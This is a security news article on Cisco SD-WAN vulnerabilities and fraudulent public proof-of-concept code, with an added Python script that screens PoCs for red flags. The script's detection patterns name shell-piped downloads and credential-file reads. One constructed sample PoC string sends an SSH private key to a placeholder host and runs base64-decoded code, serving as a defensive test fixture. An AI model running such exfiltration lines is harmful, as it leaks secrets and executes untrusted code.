
Prioritizing Cisco SD-WAN Vulnerabilities: Navigating PoC Reliability and Hidden Risks

Security teams managing Cisco Catalyst SD-WAN environments face a complex landscape of newly disclosed vulnerabilities and unreliable proof-of-concept (PoC) data. By relying on verified research and addressing less-publicized risks such as CVE-2026-20133, organizations can protect their network management infrastructure more effectively.

Triage Security Media Team

Following Cisco’s February 25 disclosure of six new vulnerabilities in its Software-Defined Wide Area Network (SD-WAN) management product, security teams have focused heavily on one critical issue. At least three of these vulnerabilities have been targeted in unauthorized access attempts. One in particular, CVE-2026-20127, received a 10 out of 10 Common Vulnerability Scoring System (CVSS) score and appears to have been leveraged as a zero-day by a threat actor for at least three years.

While CVE-2026-20127 requires immediate attention, researchers at VulnCheck emphasize that organizations should also evaluate CVE-2026-20133, a less publicized but highly impactful vulnerability. Compounding the challenge for defenders is a high volume of unreliable or inaccurate proof-of-concept (PoC) code circulating publicly, which can complicate remediation and testing efforts.

Evaluating CVE-2026-20127 and CVE-2026-20133

CVE-2026-20133 is an information-disclosure vulnerability with a high-severity CVSS score of 7.5. While it is not yet known to be exploited in the wild, VulnCheck researchers demonstrated that it provides enough file system read access to retrieve the private key associated with the default "vmanage-admin" user.

That key is the credential used to authenticate to the Network Configuration Protocol (NETCONF) interface through which SD-WAN devices are configured and managed, so obtaining it gives an attacker the same management access. During their evaluation, the researchers also used the vulnerability to read "confd_ipc_secret", a shared secret used for internal communication, which allows any local user to escalate to root. With these secrets, unauthorized parties could push network configuration changes or alter traffic routing across an organization.

Internet-wide scanning services disagree on the exposure, reporting anywhere from roughly 275 to several thousand Cisco SD-WAN Managers reachable from the public internet. Organizations should immediately take the management interface off the public internet and apply the vendor's patches for CVE-2026-20127, CVE-2026-20133, and the related vulnerabilities in the same advisory.

Following the initial security advisory, multiple PoC scripts surfaced online claiming to validate CVE-2026-20127. VulnCheck analyzed these submissions and found several to be non-functional or fraudulent.

"Typically for these types of emerging threats, we'll see two, three, five, or more than that," says Caitlin Condon, vice president of security research at VulnCheck. "Sometimes PoCs are completely fake, or nonfunctional, or malicious. It's certainly not unusual these days to see a wave of AI-slop PoCs targeting emerging bugs. We don't see as many valid, public PoCs popping up in the first couple of days after one of these incidents is disclosed."

One functional PoC, developed by GitHub user "zerozenxlabs," did not actually exercise CVE-2026-20127. Instead, it chained three other newly disclosed SD-WAN Manager vulnerabilities: it combined CVE-2026-20128 and CVE-2026-20133 to read a credential file, then used CVE-2026-20122 to upload a webshell through the application programming interface (API).

For Condon, this trend indicates a shift in how security teams should evaluate risk signals. "Part of the lesson here is that we are seeing very quickly, I think, the devaluation of public PoC code as a first-class risk signal," she explains. "For many organizations, there are too many critical bugs to patch, too many products and vulnerabilities to pay attention to, and be able to prioritize. Organizations are overwhelmed. And usually that emergency take-action moment is when people are saying: 'Hey, there's public PoC for this, now you really need to pay attention.' 'PoC or GTFO' has been one of the common industry adages for many years."

Rather than waiting for public PoCs, Condon advises organizations to prioritize verified indicators of unauthorized access. "It's very difficult to figure out, sometimes, whether fake PoCs are actually fake, because they're convincingly fake," she says. "Real-world exploitation signals have become much more important as the value of public PoCs is being diluted."
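The practical consequence of the points above is that a public PoC has to be read before it is run. The following is an added example, not code from the article, VulnCheck, or any of the PoC authors mentioned: a small heuristic triage script that flags the cheap red flags a reviewer checks first (obfuscated `exec`/`eval`, remote code piped into a shell, callbacks to a hardcoded third-party host, reads of local credential files) and, mirroring the "zerozenxlabs" case, whether the CVE the file advertises is the only CVE its body references. All rule names, the allowed-host list, and the three sample PoC strings are constructed for this example; a clean result only means these checks passed, not that the PoC is genuine or safe.

```python
"""Heuristic pre-run triage of a public PoC script (added example, not the
article's or VulnCheck's code). A clean result is NOT proof the PoC is real
or safe; a human still has to read it."""
import re
from dataclasses import dataclass

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")

# Per-line regex rules. Rule names are this example's own.
LINE_RULES = [
    ("obfuscated-exec",
     re.compile(r"\b(exec|eval)\s*\(.*\b(b64decode|decompress|fromhex|__import__)\b")),
    ("remote-code-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("local-credential-read",
     re.compile(r"(\.ssh/id_[a-z0-9]+|\.aws/credentials|/etc/shadow|\.git-credentials)")),
]

# Hosts a PoC may legitimately contact: placeholders and loopback only.
# Assumption for the example; extend per engagement.
ALLOWED_HOSTS = {"target", "localhost", "127.0.0.1"}

SEVERE = {"obfuscated-exec", "remote-code-to-shell",
          "local-credential-read", "third-party-callback"}


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int   # 1-based; 0 for whole-file findings
    text: str


def triage_poc(source: str) -> list:
    """Return a list of Finding for the given PoC source text."""
    findings = []
    lines = source.splitlines()
    for i, line in enumerate(lines, start=1):
        for name, rx in LINE_RULES:
            if rx.search(line):
                findings.append(Finding(name, i, line.strip()))
        # Reference links in comments are normal; a literal non-placeholder
        # host in executable code is a likely beacon or exfil endpoint.
        if line.lstrip().startswith(("#", "//")):
            continue
        for host in URL_RE.findall(line):
            if host.lower() not in ALLOWED_HOSTS:
                findings.append(Finding("third-party-callback", i, host))

    # The first CVE ID in the file is what the PoC advertises. Any other CVE
    # it references means it is testing something else (or a chain).
    first = CVE_RE.search(source)
    if first:
        claimed = first.group(0).upper()
        referenced = {c.upper() for c in CVE_RE.findall(source)}
        extra = sorted(referenced - {claimed})
        if extra:
            findings.append(Finding("cve-mismatch", 0,
                                    f"claims {claimed}, body also references {extra}"))
    return findings


def verdict(findings) -> str:
    """Collapse findings into a decision for the person about to run the PoC."""
    rules = {f.rule for f in findings}
    if rules & SEVERE:
        return "do-not-run"
    if rules:
        return "review"
    return "no-red-flags"


# Constructed sample inputs (not real PoCs). Paths and hosts are invented.
FAKE_POC = '''#!/usr/bin/env python3
# PoC for CVE-2026-20127 - Cisco Catalyst SD-WAN Manager (constructed sample)
import base64, requests, sys
target = sys.argv[1]
requests.get(f"https://{target}/", verify=False)
requests.post("https://updates-cdn.example.net/t", data=open("/root/.ssh/id_rsa").read())
exec(base64.b64decode("aW1wb3J0IG9z"))
'''

CHAINED_POC = '''# CVE-2026-20127 check (constructed sample)
import requests, sys
target = sys.argv[1]
# step 1: CVE-2026-20128 + CVE-2026-20133 read a credential file
# step 2: CVE-2026-20122 upload via the API
'''

CLEAN_POC = '''#!/usr/bin/env python3
"""Reachability check for CVE-2026-20127 testing (constructed sample)."""
import argparse, requests
p = argparse.ArgumentParser()
p.add_argument("target")
args = p.parse_args()
r = requests.get(f"https://{args.target}/", timeout=10, verify=False)
print(r.status_code)
'''

if __name__ == "__main__":
    for name, src in (("fake", FAKE_POC), ("chained", CHAINED_POC), ("clean", CLEAN_POC)):
        fs = triage_poc(src)
        print(name, verdict(fs), [(f.rule, f.line_no) for f in fs])
```

The "cve-mismatch" rule is deliberately only a "review" signal: a legitimate chain PoC will trip it too, and the point is that the file needs a reader, not that it is malicious. The severe rules are the ones where running the script is itself the risk.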

The value of verifiable security research

A verified, accurate PoC for CVE-2026-20127 was published on March 11 by a security researcher at Rapid7. Validated research tools like this remain a core part of the security ecosystem, providing defenders with the means to confirm exposure and test their own detection systems.

"Researchers have a super important place in this ecosystem," Condon argues. "Their ability to demonstrate exploitability and validate that a vulnerability really does have real world impact is still critical. I, personally, think that is very useful in the public."

To illustrate this, she points out that a third of vulnerabilities from 2025 still lack public testing code. "But, many of them are being used by multiple ransomware groups," she says. "So the only people who have those exploits in full are adversaries, and they're continuing to be used to [great] effect. Many organizations are very nervous about exploit code being public. I understand where that comes from. However, in that type of situation, is it better for only adversaries — and often several of them, to have that exploit? I'll leave that question for readers to answer, but my position would be: no."